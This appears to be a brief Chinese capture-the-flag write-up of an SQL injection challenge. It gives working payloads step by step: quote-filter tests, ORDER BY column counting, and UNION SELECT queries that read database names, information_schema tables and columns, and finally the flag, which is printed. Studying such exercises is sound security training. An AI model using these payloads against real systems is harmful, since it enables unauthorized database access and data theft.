测过滤
1’ 否
1’# 可
1‘+ 否
1’* 可
1‘- 可
加 # 引号闭合
1' order by 4# 回显
1' order by 5# 不回显
四个注入点
联合查询测注入点
-1' union select 1,2,3,4'
爆数据库
数据库版本:version()
数据库库名:database()
-1' union select 1,2,version(),database()'
爆表
-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema = database()#
fl4g,sc
爆列
-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema = database()#
skctf_flag,id,name,math,english,chinese
看到 skctf_flag
-1' union select 1,2,3,skctf_flag from fl4g#
得到 flag
flag{62a29b5f4dc777b7c77bdabe26dfd8fe}